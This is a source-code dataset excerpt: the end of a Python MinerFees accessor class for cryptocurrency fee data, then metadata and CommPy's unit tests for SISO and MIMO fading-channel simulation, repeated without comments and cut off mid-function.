def set_ltc(self, ltc: MinerFeesItem):
"""
Set method for the ltc
:param ltc: ltc
"""
self.__ltc = ltc
def get_pax(self):
"""
Get method for the pax
:return: pax
"""
return self.__pax
def set_pax(self, pax: MinerFeesItem):
"""
Set method for the pax
:param pax: pax
"""
self.__pax = pax
def get_busd(self):
"""
Get method for the busd
:return: busd
"""
return self.__busd
def set_busd(self, busd: MinerFeesItem):
"""
Set method for the busd
:param busd: busd
"""
self.__busd = busd
def get_xrp(self):
"""
Get method for the xrp
:return: xrp
"""
return self.__xrp
def set_xrp(self, xrp: MinerFeesItem):
"""
Set method for the xrp
:param xrp: xrp
"""
self.__xrp = xrp
def to_json(self):
"""
:return: data in json
"""
data = {
"btc": self.get_btc(),
"bch": self.get_bch(),
"eth": self.get_eth(),
"usdc": self.get_usdc(),
"gusd": self.get_gusd(),
"pax": self.get_pax(),
"doge": self.get_doge(),
"ltc": self.get_ltc(),
"xrp": self.get_xrp(),
"busd": self.get_busd(),
}
data = {key: value for key, value in data.items() if value}
return data
| 22.417526 | 86 | 0.496896 | from .miner_fees_item import MinerFeesItem
class MinerFees:
__btc = MinerFeesItem()
__bch = MinerFeesItem()
__eth = MinerFeesItem()
__usdc = MinerFeesItem()
__gusd = MinerFeesItem()
__pax = MinerFeesItem()
__doge = MinerFeesItem()
__ltc = MinerFeesItem()
__busd = MinerFeesItem()
__xrp = MinerFeesItem()
def __init__(self, **kwargs):
for key, value in kwargs.items():
try:
if key in ["BTC", "BCH", "ETH", "USDC", "GUSD", "PAX", "BUSD", "XRP"]:
value = MinerFeesItem(**value)
getattr(self, "set_%s" % key.lower())(value)
except AttributeError:
pass
def get_btc(self):
return self.__btc
def set_btc(self, btc: MinerFeesItem):
self.__btc = btc
def get_bch(self):
return self.__bch
def set_bch(self, bch: MinerFeesItem):
self.__bch = bch
def get_eth(self):
return self.__eth
def set_eth(self, eth: MinerFeesItem):
self.__eth = eth
def get_usdc(self):
return self.__usdc
def set_usdc(self, usdc: MinerFeesItem):
self.__usdc = usdc
def get_gusd(self):
return self.__gusd
def set_gusd(self, gusd: MinerFeesItem):
self.__gusd = gusd
def get_doge(self):
return self.__doge
def set_doge(self, doge: MinerFeesItem):
self.__doge = doge
def get_ltc(self):
return self.__ltc
def set_ltc(self, ltc: MinerFeesItem):
self.__ltc = ltc
def get_pax(self):
return self.__pax
def set_pax(self, pax: MinerFeesItem):
self.__pax = pax
def get_busd(self):
return self.__busd
def set_busd(self, busd: MinerFeesItem):
self.__busd = busd
def get_xrp(self):
return self.__xrp
def set_xrp(self, xrp: MinerFeesItem):
self.__xrp = xrp
def to_json(self):
data = {
"btc": self.get_btc(),
"bch": self.get_bch(),
"eth": self.get_eth(),
"usdc": self.get_usdc(),
"gusd": self.get_gusd(),
"pax": self.get_pax(),
"doge": self.get_doge(),
"ltc": self.get_ltc(),
"xrp": self.get_xrp(),
"busd": self.get_busd(),
}
data = {key: value for key, value in data.items() if value}
return data
| true | true |
f72331ce7e5021c4af4e2217fc8fa2d1b6c67d72 | 22,215 | py | Python | commpy/tests/test_channels.py | goodcq/CommPy | af3a9acba32d2f9c6b723705f709fee2cb9352e2 | [
"BSD-3-Clause"
] | 2 | 2018-11-18T22:10:49.000Z | 2019-07-12T08:35:24.000Z | commpy/tests/test_channels.py | goodcq/CommPy | af3a9acba32d2f9c6b723705f709fee2cb9352e2 | [
"BSD-3-Clause"
] | null | null | null | commpy/tests/test_channels.py | goodcq/CommPy | af3a9acba32d2f9c6b723705f709fee2cb9352e2 | [
"BSD-3-Clause"
] | 1 | 2020-10-13T10:33:23.000Z | 2020-10-13T10:33:23.000Z | # Authors: CommPy contributors
# License: BSD 3-Clause
from __future__ import division, print_function # Python 2 compatibility
from math import cos
from numpy import ones, inf, sqrt, array, identity, zeros, dot, trace, einsum, absolute, exp, pi, fromiter, kron, \
zeros_like, empty
from numpy.random import seed, choice, randn
from numpy.testing import run_module_suite, assert_raises, assert_equal, assert_allclose, \
assert_array_equal, dec
from commpy.channels import SISOFlatChannel, MIMOFlatChannel
from commpy.utilities import signal_power
class TestSISOFlatChannel:
msg_length = 100000
real_mods = array((-1, 1)), array((-3, 3))
all_mods = array((-1, 1)), array((-3, 3)), \
array((-1 - 1j, -1 + 1j, 1 - 1j, 1 + 1j)), array((-3 - 3j, -3 + 3j, 3 - 3j, 3 + 3j))
def test_default_args(self):
def check(chan):
assert_equal(chan.noises, None,
err_msg='Default noises is not None')
assert_equal(chan.channel_gains, None,
err_msg='Default channel gains is not None')
assert_equal(chan.unnoisy_output, None,
err_msg='Default unnoisy output is not None')
chan = SISOFlatChannel()
# Test output state before any propagation
check(chan)
# Test that noise standard deviation must be set before propagation
with assert_raises(AssertionError):
chan.propagate(array((1, 1)))
# Test output state before any propagation
check(chan)
assert_equal(chan.nb_rx, 1,
err_msg='SISO channel as more than 1 Rx')
assert_equal(chan.nb_tx, 1,
err_msg='SISO channel as more than 1 Tx')
def test_fading(self):
# Set seed
seed(17121996)
def check_chan_gain(mod, chan):
msg = choice(mod, self.msg_length)
chan.propagate(msg)
P_msg = signal_power(msg)
P_unnoisy = signal_power(chan.unnoisy_output)
assert_allclose(P_unnoisy, P_msg, rtol=0.2,
err_msg='Channel add or remove energy')
# Test value checking in constructor construction
with assert_raises(ValueError):
SISOFlatChannel(0, (1, 1))
chan = SISOFlatChannel(0)
# Test on real channel
for mod in self.real_mods:
# Test value checking after construction
with assert_raises(ValueError):
chan.fading_param = (1, 1)
# Test without fading
chan.fading_param = (1, 0)
check_chan_gain(mod, chan)
assert_array_equal(chan.channel_gains, ones(self.msg_length),
err_msg='Channel fading while fading is disabled')
# Test with Rayleigh fading
chan.fading_param = (0, 1)
check_chan_gain(mod, chan)
assert_allclose(absolute(chan.channel_gains.mean()), 0, atol=2e-2,
err_msg='Wrong channel mean with real channel')
assert_allclose(chan.channel_gains.var(), 1, atol=0.2,
err_msg='Wrong channel variance with real channel')
# Test with rician fading
chan.fading_param = (sqrt(2 / 3), 1 / 3)
check_chan_gain(mod, chan)
assert_allclose(chan.channel_gains.mean(), sqrt(2 / 3), atol=2e-2,
err_msg='Wrong channel mean with real channel')
assert_allclose(chan.channel_gains.var(), 1 / 3, atol=0.2,
err_msg='Wrong channel variance with real channel')
# Test on complex channel
for mod in self.all_mods:
# Test value checking after construction
with assert_raises(ValueError):
chan.fading_param = (1, 1)
# Test without fading
chan.fading_param = (1 + 0j, 0)
check_chan_gain(mod, chan)
assert_array_equal(chan.channel_gains, ones(self.msg_length),
err_msg='Channel fading while fading is disabled')
# Test with Rayleigh fading
chan.fading_param = (0j, 1)
check_chan_gain(mod, chan)
assert_allclose(absolute(chan.channel_gains.mean()), 0, atol=2e-2,
err_msg='Wrong channel mean with real channel')
assert_allclose(chan.channel_gains.var(), 1, atol=0.2,
err_msg='Wrong channel variance with real channel')
# Test with rician fading
chan.fading_param = (0.5 + 0.5j, 0.5)
check_chan_gain(mod, chan)
assert_allclose(absolute(chan.channel_gains.mean()), sqrt(0.5), atol=2e-2,
err_msg='Wrong channel mean with real channel')
assert_allclose(chan.channel_gains.var(), 0.5, atol=0.2,
err_msg='Wrong channel variance with real channel')
def test_noise_generation(self):
# Set seed
seed(17121996)
def check_noise(mod, chan, corrected_SNR_lin):
msg = choice(mod, self.msg_length)
chan.propagate(msg)
P_msg = signal_power(msg) # previous test asserted that channel neither add nor remove energy
P_noise = signal_power(chan.noises)
assert_allclose(absolute(chan.noises.mean()), 0., atol=5e-2,
err_msg='Noise mean is not 0')
if corrected_SNR_lin == inf:
assert_allclose(P_noise, 0, atol=1e-2,
err_msg='There is noise that should not be here')
else:
assert_allclose(P_msg / P_noise, corrected_SNR_lin, atol=0.2,
err_msg='Wrong SNR')
chan = SISOFlatChannel(fading_param=(1 + 0j, 0))
for mod in self.all_mods:
chan.noise_std = 0
check_noise(mod, chan, inf)
chan.set_SNR_lin(6, Es=signal_power(mod))
check_noise(mod, chan, 6)
chan.set_SNR_lin(6, .5, signal_power(mod))
check_noise(mod, chan, 3)
chan.set_SNR_dB(0, Es=signal_power(mod))
check_noise(mod, chan, 1)
chan.set_SNR_dB(0, .5, signal_power(mod))
check_noise(mod, chan, .5)
chan = SISOFlatChannel(fading_param=(1, 0))
for mod in self.real_mods:
chan.noise_std = 0
check_noise(mod, chan, inf)
chan.set_SNR_lin(6, Es=signal_power(mod))
check_noise(mod, chan, 6)
chan.set_SNR_lin(6, .5, signal_power(mod))
check_noise(mod, chan, 3)
chan.set_SNR_dB(0, Es=signal_power(mod))
check_noise(mod, chan, 1)
chan.set_SNR_dB(0, .5, signal_power(mod))
check_noise(mod, chan, .5)
def test_type_check(self):
chan = SISOFlatChannel(0)
with assert_raises(TypeError):
chan.propagate(array((1, 1j)))
def test_k_factor(self):
# Real channel
chan = SISOFlatChannel()
assert_allclose(chan.k_factor, inf,
err_msg='k-factor should be infinite without fading in SISO channels')
chan.fading_param = 0, 1
assert_allclose(chan.k_factor, 0,
err_msg='k-factor should be 0 with Rayleigh fading in SISO channels')
chan.fading_param = sqrt(0.5), 0.5
assert_allclose(chan.k_factor, 1,
err_msg='Wrong k-factor with rician fading in SISO channels')
# Complex channel
chan.fading_param = 1j, 0
assert_allclose(chan.k_factor, inf,
err_msg='k-factor should be infinite without fading in SISO channels')
chan.fading_param = 0j, 1
assert_allclose(chan.k_factor, 0,
err_msg='k-factor should be 0 with Rayleigh fading in SISO channels')
chan.fading_param = 0.5 + 0.5j, 0.5
assert_allclose(chan.k_factor, 1,
err_msg='Wrong k-factor with rician fading in SISO channels')
class MIMOTestCase(object):
msg_length = 100000
real_mods = array((-1, 1)), array((-3, 3))
all_mods = array((-1, 1)), array((-3, 3)), \
array((-1 - 1j, -1 + 1j, 1 - 1j, 1 + 1j)), array((-3 - 3j, -3 + 3j, 3 - 3j, 3 + 3j))
@staticmethod
def random_SDP_matrix(n):
G = randn(n, n)
dot(G, G.T, G)
return G / trace(G)
def test_symetric(self):
nb_tx = 8
nb_rx = 8
self.do(nb_tx, nb_rx)
def test_more_rx(self):
nb_tx = 4
nb_rx = 8
self.do(nb_tx, nb_rx)
def test_more_tx(self):
nb_tx = 8
nb_rx = 4
self.do(nb_tx, nb_rx)
def test_SIMO(self):
nb_tx = 1
nb_rx = 8
self.do(nb_tx, nb_rx)
def test_MISO(self):
nb_tx = 8
nb_rx = 1
self.do(nb_tx, nb_rx)
def test_SISO(self):
nb_tx = 1
nb_rx = 1
self.do(nb_tx, nb_rx)
class TestMIMODefaultArgs(MIMOTestCase):
def __init__(self):
super(TestMIMODefaultArgs, self).__init__()
def do(self, nb_tx, nb_rx):
def check(chan):
assert_equal(chan.noises, None,
err_msg='Default noises is not None')
assert_equal(chan.channel_gains, None,
err_msg='Default channel gains is not None')
assert_equal(chan.unnoisy_output, None,
err_msg='Default unnoisy output is not None')
chan = MIMOFlatChannel(nb_tx, nb_rx)
# Test output state before any propagation
check(chan)
# Test that noise standard deviation must be set before propagation
with assert_raises(AssertionError):
chan.propagate(array((1, 1)))
# Test output state before any propagation
check(chan)
@dec.slow
class TestMIMOFading(MIMOTestCase):
def __init__(self):
super(TestMIMOFading, self).__init__()
def do(self, nb_tx, nb_rx):
# Set seed
seed(17121996)
def check_chan_gain(mod, chan):
msg = choice(mod, self.msg_length)
chan.propagate(msg)
P_msg = signal_power(msg)
P_unnoisy = signal_power(chan.unnoisy_output)
assert_allclose(P_unnoisy, P_msg * chan.nb_tx, rtol=0.2,
err_msg='Channel add or remove energy')
def expo_correlation(t, r):
# Construct the exponent matrix
expo_tx = fromiter((j - i for i in range(chan.nb_tx) for j in range(chan.nb_tx)), int, chan.nb_tx ** 2)
expo_rx = fromiter((j - i for i in range(chan.nb_rx) for j in range(chan.nb_rx)), int, chan.nb_rx ** 2)
# Reshape
expo_tx = expo_tx.reshape(chan.nb_tx, chan.nb_tx)
expo_rx = expo_rx.reshape(chan.nb_rx, chan.nb_rx)
return t ** expo_tx, r ** expo_rx
def check_correlation(chan, Rt, Rr):
nb_ant = chan.nb_tx * chan.nb_rx
Rdes = kron(Rt, Rr)
H = chan.channel_gains
Ract = zeros_like(Rdes)
for i in range(len(H)):
Ract += H[i].T.reshape(nb_ant, 1).dot(H[i].T.reshape(1, nb_ant).conj())
Ract /= len(H)
assert_allclose(Rdes, Ract, atol=0.05,
err_msg='Wrong correlation matrix')
# Test value checking in constructor construction
with assert_raises(ValueError):
MIMOFlatChannel(nb_tx, nb_tx, 0, (ones((nb_tx, nb_tx)), ones((nb_tx, nb_tx)), ones((nb_rx, nb_rx))))
chan = MIMOFlatChannel(nb_tx, nb_rx, 0)
prod_nb = nb_tx * nb_rx
# Test on real channel
for mod in self.real_mods:
# Test value checking after construction
with assert_raises(ValueError):
chan.fading_param = (ones((nb_tx, nb_tx)), ones((nb_tx, nb_tx)), ones((nb_rx, nb_rx)))
# Test with Rayleigh fading
chan.fading_param = (zeros((nb_rx, nb_tx)), identity(nb_tx), identity(nb_rx))
check_chan_gain(mod, chan)
# Test with rician fading
mean = randn(nb_rx, nb_tx)
mean *= sqrt(prod_nb * 0.75 / einsum('ij,ij->', absolute(mean), absolute(mean)))
Rt = self.random_SDP_matrix(nb_tx) * sqrt(prod_nb) * 0.5
Rr = self.random_SDP_matrix(nb_rx) * sqrt(prod_nb) * 0.5
chan.fading_param = (mean, Rt, Rr)
check_chan_gain(mod, chan)
# Test helper functions
chan.uncorr_rayleigh_fading(float)
check_chan_gain(mod, chan)
assert_allclose(chan.k_factor, 0,
err_msg='Wrong k-factor with uncorrelated Rayleigh fading')
mean = randn(nb_rx, nb_tx)
chan.uncorr_rician_fading(mean, 10)
check_chan_gain(mod, chan)
assert_allclose(chan.k_factor, 10,
err_msg='Wrong k-factor with uncorrelated rician fading')
# Test on complex channel
for mod in self.all_mods:
# Test value checking after construction
with assert_raises(ValueError):
chan.fading_param = (ones((nb_tx, nb_tx)), ones((nb_tx, nb_tx)), ones((nb_rx, nb_rx)))
# Test with Rayleigh fading
chan.fading_param = (zeros((nb_rx, nb_tx), complex), identity(nb_tx), identity(nb_rx))
check_chan_gain(mod, chan)
assert_allclose(chan.channel_gains.mean(), 0, atol=1e-2,
err_msg='Wrong channel mean with complex channel')
assert_allclose(chan.channel_gains.var(), 1, atol=5e-2,
err_msg='Wrong channel variance with complex channel')
# Test with rician fading
mean = randn(nb_rx, nb_tx) + 1j * randn(nb_rx, nb_tx)
mean *= sqrt(prod_nb * 0.75 / einsum('ij,ij->', absolute(mean), absolute(mean)))
Rt = self.random_SDP_matrix(nb_tx) * sqrt(prod_nb) * 0.5
Rr = self.random_SDP_matrix(nb_rx) * sqrt(prod_nb) * 0.5
chan.fading_param = (mean, Rt, Rr)
check_chan_gain(mod, chan)
assert_allclose(chan.channel_gains.mean(0).real, mean.real, atol=0.1,
err_msg='Wrong channel mean with complex channel')
assert_allclose(chan.channel_gains.mean(0).imag, mean.imag, atol=0.1,
err_msg='Wrong channel mean with complex channel')
# Test helper functions
chan.uncorr_rayleigh_fading(complex)
check_chan_gain(mod, chan)
assert_allclose(chan.k_factor, 0,
err_msg='Wrong k-factor with uncorrelated Rayleigh fading')
mean = randn(nb_rx, nb_tx) + randn(nb_rx, nb_tx) * 1j
chan.uncorr_rician_fading(mean, 10)
check_chan_gain(mod, chan)
assert_allclose(chan.k_factor, 10,
err_msg='Wrong k-factor with uncorrelated rician fading')
chan.expo_corr_rayleigh_fading(exp(-0.2j * pi), exp(-0.1j * pi))
check_chan_gain(mod, chan)
assert_allclose(chan.k_factor, 0,
err_msg='Wrong k-factor with correlated Rayleigh fading')
Rt, Rr = expo_correlation(exp(-0.2j * pi), exp(-0.1j * pi))
check_correlation(chan, Rt, Rr)
mean = randn(nb_rx, nb_tx) + randn(nb_rx, nb_tx) * 1j
chan.expo_corr_rician_fading(mean, 10, exp(-0.1j * pi), exp(-0.2j * pi))
check_chan_gain(mod, chan)
assert_allclose(chan.k_factor, 10,
err_msg='Wrong k-factor with correlated rician fading')
# Test with beta > 0
chan.expo_corr_rayleigh_fading(exp(-0.2j * pi), exp(-0.1j * pi), 1, 0.5)
check_chan_gain(mod, chan)
assert_allclose(chan.k_factor, 0,
err_msg='Wrong k-factor with correlated Rayleigh fading')
mean = randn(nb_rx, nb_tx) + randn(nb_rx, nb_tx) * 1j
chan.expo_corr_rician_fading(mean, 5, exp(-0.1j * pi), exp(-0.2j * pi), 3, 2)
check_chan_gain(mod, chan)
assert_allclose(chan.k_factor, 5,
err_msg='Wrong k-factor with correlated rician fading')
class TestMIMOSpectular(MIMOTestCase):
def __init__(self):
super(TestMIMOSpectular, self).__init__()
def do(self, nb_tx, nb_rx):
chan = MIMOFlatChannel(nb_tx, nb_rx, 0)
# Test raising of ValueError
with assert_raises(ValueError):
chan.specular_compo(0, -1, 0, 1)
with assert_raises(ValueError):
chan.specular_compo(0, 1, 0, -1)
# Test the result
desired = empty((nb_rx, nb_tx), dtype=complex)
for n in range(nb_rx):
for m in range(nb_tx):
desired[n, m] = exp(1j * 2 * pi * (n * 1 * cos(0.5) - m * 0.1 * cos(2)))
assert_allclose(chan.specular_compo(2, 0.1, 0.5, 1), desired, rtol=0.02,
err_msg='Wrong specular component')
@dec.slow
class TestMIMONoiseGeneration(MIMOTestCase):
def __init__(self):
super(TestMIMONoiseGeneration, self).__init__()
def do(self, nb_tx, nb_rx):
# Set seed
seed(17121996)
def check_noise(mod, chan, corrected_SNR_lin):
msg = choice(mod, self.msg_length)
chan.propagate(msg)
P_msg = signal_power(msg) # previous test asserted that channel neither add nor remove energy
P_noise = signal_power(chan.noises)
assert_allclose(abs(chan.noises.mean()), 0., atol=0.5,
err_msg='Noise mean is not 0')
if corrected_SNR_lin == inf:
assert_allclose(P_noise, 0, atol=1e-2,
err_msg='There is noise that should not be here')
else:
assert_allclose(chan.nb_tx * P_msg / P_noise, corrected_SNR_lin, atol=0.2,
err_msg='Wrong SNR')
fading_param = zeros((nb_rx, nb_tx), complex), identity(nb_tx), identity(nb_rx)
chan = MIMOFlatChannel(nb_tx, nb_rx, fading_param=fading_param)
for mod in self.all_mods:
chan.noise_std = 0
check_noise(mod, chan, inf)
chan.set_SNR_lin(6, Es=signal_power(mod))
check_noise(mod, chan, 6)
chan.set_SNR_lin(6, .5, signal_power(mod))
check_noise(mod, chan, 3)
chan.set_SNR_dB(0, Es=signal_power(mod))
check_noise(mod, chan, 1)
chan.set_SNR_dB(0, .5, signal_power(mod))
check_noise(mod, chan, .5)
class TestMIMOTypeCheck(MIMOTestCase):
def __init__(self):
super(TestMIMOTypeCheck, self).__init__()
def do(self, nb_tx, nb_rx):
chan = MIMOFlatChannel(nb_tx, nb_rx, 0)
with assert_raises(TypeError):
chan.propagate(array((1, 1j)))
class TestMIMOShapes(MIMOTestCase):
def __init__(self):
super(TestMIMOShapes, self).__init__()
def do(self, nb_tx, nb_rx):
# Without padding
chan = MIMOFlatChannel(nb_tx, nb_rx, 0)
out = chan.propagate(ones(nb_tx * 2))
assert_array_equal(chan.channel_gains.shape, (2, nb_rx, nb_tx),
err_msg='Wrong channel shape without padding')
assert_array_equal(chan.noises.shape, (2, nb_rx),
err_msg='Wrong channel shape without padding')
assert_array_equal(chan.unnoisy_output.shape, (2, nb_rx),
err_msg='Wrong channel shape without padding')
assert_array_equal(out.shape, (2, nb_rx),
err_msg='Wrong channel shape without padding')
# With padding
chan = MIMOFlatChannel(nb_tx, nb_rx, 0)
out = chan.propagate(ones(nb_tx * 2 + 1))
assert_array_equal(chan.channel_gains.shape, (3, nb_rx, nb_tx),
err_msg='Wrong channel shape with padding')
assert_array_equal(chan.noises.shape, (3, nb_rx),
err_msg='Wrong channel shape with padding')
assert_array_equal(chan.unnoisy_output.shape, (3, nb_rx),
err_msg='Wrong channel shape with padding')
assert_array_equal(out.shape, (3, nb_rx),
err_msg='Wrong channel shape with padding')
class TestMIMOkFactor(MIMOTestCase):
def __init__(self):
super(TestMIMOkFactor, self).__init__()
def do(self, nb_tx, nb_rx):
# Set seed
seed(17121996)
prod_nb = nb_tx * nb_rx
# Real channel
chan = MIMOFlatChannel(nb_tx, nb_rx)
assert_allclose(chan.k_factor, 0,
err_msg='k-factor should be 0 with Rayleigh fading in SISO channels')
mean = randn(nb_rx, nb_tx)
mean *= sqrt(prod_nb * 0.75 / einsum('ij,ij->', absolute(mean), absolute(mean)))
Rs = self.random_SDP_matrix(nb_tx) * sqrt(prod_nb) * 0.5
Rr = self.random_SDP_matrix(nb_rx) * sqrt(prod_nb) * 0.5
chan.fading_param = mean, Rs, Rr
assert_allclose(chan.k_factor, 3,
err_msg='Wrong k-factor with rician fading in SISO channels')
# Complex channel
chan.fading_param = (zeros((nb_rx, nb_tx), complex), identity(nb_tx), identity(nb_rx))
assert_allclose(chan.k_factor, 0,
err_msg='k-factor should be 0 with Rayleigh fading in SISO channels')
mean = randn(nb_rx, nb_tx) + 1j * randn(nb_rx, nb_tx)
mean *= sqrt(prod_nb * 0.75 / einsum('ij,ij->', absolute(mean), absolute(mean)))
Rs = self.random_SDP_matrix(nb_tx) * sqrt(prod_nb) * 0.5
Rr = self.random_SDP_matrix(nb_rx) * sqrt(prod_nb) * 0.5
chan.fading_param = (mean, Rs, Rr)
assert_allclose(chan.k_factor, 3,
err_msg='Wrong k-factor with rician fading in SISO channels')
if __name__ == "__main__":
run_module_suite()
| 40.244565 | 115 | 0.577358 |
from __future__ import division, print_function
from math import cos
from numpy import ones, inf, sqrt, array, identity, zeros, dot, trace, einsum, absolute, exp, pi, fromiter, kron, \
zeros_like, empty
from numpy.random import seed, choice, randn
from numpy.testing import run_module_suite, assert_raises, assert_equal, assert_allclose, \
assert_array_equal, dec
from commpy.channels import SISOFlatChannel, MIMOFlatChannel
from commpy.utilities import signal_power
class TestSISOFlatChannel:
msg_length = 100000
real_mods = array((-1, 1)), array((-3, 3))
all_mods = array((-1, 1)), array((-3, 3)), \
array((-1 - 1j, -1 + 1j, 1 - 1j, 1 + 1j)), array((-3 - 3j, -3 + 3j, 3 - 3j, 3 + 3j))
def test_default_args(self):
def check(chan):
assert_equal(chan.noises, None,
err_msg='Default noises is not None')
assert_equal(chan.channel_gains, None,
err_msg='Default channel gains is not None')
assert_equal(chan.unnoisy_output, None,
err_msg='Default unnoisy output is not None')
chan = SISOFlatChannel()
check(chan)
with assert_raises(AssertionError):
chan.propagate(array((1, 1)))
check(chan)
assert_equal(chan.nb_rx, 1,
err_msg='SISO channel as more than 1 Rx')
assert_equal(chan.nb_tx, 1,
err_msg='SISO channel as more than 1 Tx')
def test_fading(self):
seed(17121996)
def check_chan_gain(mod, chan):
msg = choice(mod, self.msg_length)
chan.propagate(msg)
P_msg = signal_power(msg)
P_unnoisy = signal_power(chan.unnoisy_output)
assert_allclose(P_unnoisy, P_msg, rtol=0.2,
err_msg='Channel add or remove energy')
with assert_raises(ValueError):
SISOFlatChannel(0, (1, 1))
chan = SISOFlatChannel(0)
for mod in self.real_mods:
with assert_raises(ValueError):
chan.fading_param = (1, 1)
chan.fading_param = (1, 0)
check_chan_gain(mod, chan)
assert_array_equal(chan.channel_gains, ones(self.msg_length),
err_msg='Channel fading while fading is disabled')
chan.fading_param = (0, 1)
check_chan_gain(mod, chan)
assert_allclose(absolute(chan.channel_gains.mean()), 0, atol=2e-2,
err_msg='Wrong channel mean with real channel')
assert_allclose(chan.channel_gains.var(), 1, atol=0.2,
err_msg='Wrong channel variance with real channel')
chan.fading_param = (sqrt(2 / 3), 1 / 3)
check_chan_gain(mod, chan)
assert_allclose(chan.channel_gains.mean(), sqrt(2 / 3), atol=2e-2,
err_msg='Wrong channel mean with real channel')
assert_allclose(chan.channel_gains.var(), 1 / 3, atol=0.2,
err_msg='Wrong channel variance with real channel')
for mod in self.all_mods:
with assert_raises(ValueError):
chan.fading_param = (1, 1)
chan.fading_param = (1 + 0j, 0)
check_chan_gain(mod, chan)
assert_array_equal(chan.channel_gains, ones(self.msg_length),
err_msg='Channel fading while fading is disabled')
chan.fading_param = (0j, 1)
check_chan_gain(mod, chan)
assert_allclose(absolute(chan.channel_gains.mean()), 0, atol=2e-2,
err_msg='Wrong channel mean with real channel')
assert_allclose(chan.channel_gains.var(), 1, atol=0.2,
err_msg='Wrong channel variance with real channel')
chan.fading_param = (0.5 + 0.5j, 0.5)
check_chan_gain(mod, chan)
assert_allclose(absolute(chan.channel_gains.mean()), sqrt(0.5), atol=2e-2,
err_msg='Wrong channel mean with real channel')
assert_allclose(chan.channel_gains.var(), 0.5, atol=0.2,
err_msg='Wrong channel variance with real channel')
def test_noise_generation(self):
seed(17121996)
def check_noise(mod, chan, corrected_SNR_lin):
msg = choice(mod, self.msg_length)
chan.propagate(msg)
P_msg = signal_power(msg)
P_noise = signal_power(chan.noises)
assert_allclose(absolute(chan.noises.mean()), 0., atol=5e-2,
err_msg='Noise mean is not 0')
if corrected_SNR_lin == inf:
assert_allclose(P_noise, 0, atol=1e-2,
err_msg='There is noise that should not be here')
else:
assert_allclose(P_msg / P_noise, corrected_SNR_lin, atol=0.2,
err_msg='Wrong SNR')
chan = SISOFlatChannel(fading_param=(1 + 0j, 0))
for mod in self.all_mods:
chan.noise_std = 0
check_noise(mod, chan, inf)
chan.set_SNR_lin(6, Es=signal_power(mod))
check_noise(mod, chan, 6)
chan.set_SNR_lin(6, .5, signal_power(mod))
check_noise(mod, chan, 3)
chan.set_SNR_dB(0, Es=signal_power(mod))
check_noise(mod, chan, 1)
chan.set_SNR_dB(0, .5, signal_power(mod))
check_noise(mod, chan, .5)
chan = SISOFlatChannel(fading_param=(1, 0))
for mod in self.real_mods:
chan.noise_std = 0
check_noise(mod, chan, inf)
chan.set_SNR_lin(6, Es=signal_power(mod))
check_noise(mod, chan, 6)
chan.set_SNR_lin(6, .5, signal_power(mod))
check_noise(mod, chan, 3)
chan.set_SNR_dB(0, Es=signal_power(mod))
check_noise(mod, chan, 1)
chan.set_SNR_dB(0, .5, signal_power(mod))
check_noise(mod, chan, .5)
def test_type_check(self):
chan = SISOFlatChannel(0)
with assert_raises(TypeError):
chan.propagate(array((1, 1j)))
def test_k_factor(self):
chan = SISOFlatChannel()
assert_allclose(chan.k_factor, inf,
err_msg='k-factor should be infinite without fading in SISO channels')
chan.fading_param = 0, 1
assert_allclose(chan.k_factor, 0,
err_msg='k-factor should be 0 with Rayleigh fading in SISO channels')
chan.fading_param = sqrt(0.5), 0.5
assert_allclose(chan.k_factor, 1,
err_msg='Wrong k-factor with rician fading in SISO channels')
chan.fading_param = 1j, 0
assert_allclose(chan.k_factor, inf,
err_msg='k-factor should be infinite without fading in SISO channels')
chan.fading_param = 0j, 1
assert_allclose(chan.k_factor, 0,
err_msg='k-factor should be 0 with Rayleigh fading in SISO channels')
chan.fading_param = 0.5 + 0.5j, 0.5
assert_allclose(chan.k_factor, 1,
err_msg='Wrong k-factor with rician fading in SISO channels')
class MIMOTestCase(object):
msg_length = 100000
real_mods = array((-1, 1)), array((-3, 3))
all_mods = array((-1, 1)), array((-3, 3)), \
array((-1 - 1j, -1 + 1j, 1 - 1j, 1 + 1j)), array((-3 - 3j, -3 + 3j, 3 - 3j, 3 + 3j))
@staticmethod
def random_SDP_matrix(n):
G = randn(n, n)
dot(G, G.T, G)
return G / trace(G)
def test_symetric(self):
nb_tx = 8
nb_rx = 8
self.do(nb_tx, nb_rx)
def test_more_rx(self):
nb_tx = 4
nb_rx = 8
self.do(nb_tx, nb_rx)
def test_more_tx(self):
nb_tx = 8
nb_rx = 4
self.do(nb_tx, nb_rx)
def test_SIMO(self):
nb_tx = 1
nb_rx = 8
self.do(nb_tx, nb_rx)
def test_MISO(self):
nb_tx = 8
nb_rx = 1
self.do(nb_tx, nb_rx)
def test_SISO(self):
nb_tx = 1
nb_rx = 1
self.do(nb_tx, nb_rx)
class TestMIMODefaultArgs(MIMOTestCase):
def __init__(self):
super(TestMIMODefaultArgs, self).__init__()
def do(self, nb_tx, nb_rx):
def check(chan):
assert_equal(chan.noises, None,
err_msg='Default noises is not None')
assert_equal(chan.channel_gains, None,
err_msg='Default channel gains is not None')
assert_equal(chan.unnoisy_output, None,
err_msg='Default unnoisy output is not None')
chan = MIMOFlatChannel(nb_tx, nb_rx)
check(chan)
with assert_raises(AssertionError):
chan.propagate(array((1, 1)))
check(chan)
@dec.slow
class TestMIMOFading(MIMOTestCase):
def __init__(self):
super(TestMIMOFading, self).__init__()
def do(self, nb_tx, nb_rx):
seed(17121996)
def check_chan_gain(mod, chan):
msg = choice(mod, self.msg_length)
chan.propagate(msg)
P_msg = signal_power(msg)
P_unnoisy = signal_power(chan.unnoisy_output)
assert_allclose(P_unnoisy, P_msg * chan.nb_tx, rtol=0.2,
err_msg='Channel add or remove energy')
def expo_correlation(t, r):
expo_tx = fromiter((j - i for i in range(chan.nb_tx) for j in range(chan.nb_tx)), int, chan.nb_tx ** 2)
expo_rx = fromiter((j - i for i in range(chan.nb_rx) for j in range(chan.nb_rx)), int, chan.nb_rx ** 2)
expo_tx = expo_tx.reshape(chan.nb_tx, chan.nb_tx)
expo_rx = expo_rx.reshape(chan.nb_rx, chan.nb_rx)
return t ** expo_tx, r ** expo_rx
def check_correlation(chan, Rt, Rr):
nb_ant = chan.nb_tx * chan.nb_rx
Rdes = kron(Rt, Rr)
H = chan.channel_gains
Ract = zeros_like(Rdes)
for i in range(len(H)):
Ract += H[i].T.reshape(nb_ant, 1).dot(H[i].T.reshape(1, nb_ant).conj())
Ract /= len(H)
assert_allclose(Rdes, Ract, atol=0.05,
err_msg='Wrong correlation matrix')
with assert_raises(ValueError):
MIMOFlatChannel(nb_tx, nb_tx, 0, (ones((nb_tx, nb_tx)), ones((nb_tx, nb_tx)), ones((nb_rx, nb_rx))))
